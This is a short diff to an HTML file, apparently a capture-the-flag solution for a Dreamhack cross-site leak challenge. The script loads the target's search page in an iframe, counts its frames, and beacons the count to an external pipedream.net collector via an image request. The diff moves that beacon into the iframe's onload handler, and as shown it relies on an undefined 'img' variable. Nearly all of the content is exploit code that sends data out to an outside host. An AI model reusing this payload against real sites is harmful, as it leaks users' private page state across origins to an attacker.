--- a/xsleak.html
+++ b/xsleak.html
@@ -4,7 +4,7 @@
     var iframe = document.createElement("iframe");
     iframe.src = "http://host3.dreamhack.games:8825/search?query=DreamHack";
     document.body.appendChild(iframe);
-    iframe.onload = ()=>{console.log(iframe.contentWindow.frames.length);};
-    //()=>{console.log(iframe.contentWindow.frames.length);}
-    window.location="http://en7007nj6j2rg.x.pipedream.net/?count="+iframe.contentWindow.frames.length
+    iframe.onload = ()=>{
+        img.src="http://en7007nj6j2rg.x.pipedream.net/?count="+iframe.contentWindow.frames.length   
+    };
 </script>
